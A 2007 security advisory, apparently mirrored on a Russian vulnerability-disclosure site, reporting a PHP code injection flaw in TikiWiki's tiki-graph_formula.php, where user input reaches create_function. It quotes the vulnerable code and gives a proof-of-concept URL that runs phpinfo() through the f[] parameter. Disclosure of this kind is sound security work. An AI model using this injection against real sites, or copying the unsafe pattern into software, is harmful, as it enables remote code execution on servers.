Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Vulnerabilities

  LedgerSMB < 1.2.8, SQL-Ledger 2.x Multiple SQL Injection Issues

  DNewsWeb Softwares Cross Site Scripting Vulrnability

  Viart Shopping Cart Directory Transversal Vuln

From:ShAnKaR <shankar_(at)_shankar.name>
Date:10 октября 2007 г.
Subject:TikiWiki php injection

оф сайт http://tikiwiki.org/
уязвимость носит критический характер.

файл tiki-graph_formula.php содержит код:
foreach( array_values( $_GET['f'] ) as $key=>$formula )
{
$formula = convert_formula( $formula );
...
function convert_formula( $formula )
{
...
return create_function('$x', "return $formula;");
}


Poc:
http://localhost/tikiwiki/tiki-graph_formula.
php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.
phpinfo()&t=png&title=
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
--------------
The Best forum on Web Security Application http://forum.antichat.ru/

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru